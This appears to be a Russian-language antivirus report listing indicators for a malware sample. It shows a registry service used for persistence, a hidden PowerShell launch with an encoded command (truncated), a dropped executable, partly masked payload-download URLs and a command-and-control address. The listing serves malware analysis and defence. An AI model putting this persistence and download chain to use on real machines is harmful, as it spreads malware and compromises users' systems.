Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\boostmailbox] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\boostmailbox] 'ImagePath' = '"%WINDIR%\SysWOW64\boostmailbox.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHIAdABvAG8AdwBnAGsAeQBzAGsAawBuAD0AJwBFAHAAZgBpAHMAbQBoAHgAZwBvAGkAJwA7ACQARgBmAHUAbABtAGMAdAB0AGsAZgB5ACAAPQAgACcAMQA5ADYAJwA7ACQATABuAHUAcgBuAHAAaQB1AHEAegB2AHQAPQAnAE4AagB...
- %HOMEPATH%\196.exe
- %HOMEPATH%\196.exe
- %HOMEPATH%\196.exe в %WINDIR%\syswow64\boostmailbox.exe
- %HOMEPATH%\196.exe
- http://wa##y.com/abialek/cS2gKrl/
- http://www.zy##28.com/wp-admin/ysmi97y/
- http://www.un####chemical.com/calendar/uplsb/
- http://66.##.201.20:7080/Lf9YMMoIzS2d6lU via 66.##.201.20
- DNS ASK wa##y.com
- DNS ASK zy##28.com
- DNS ASK un####chemical.com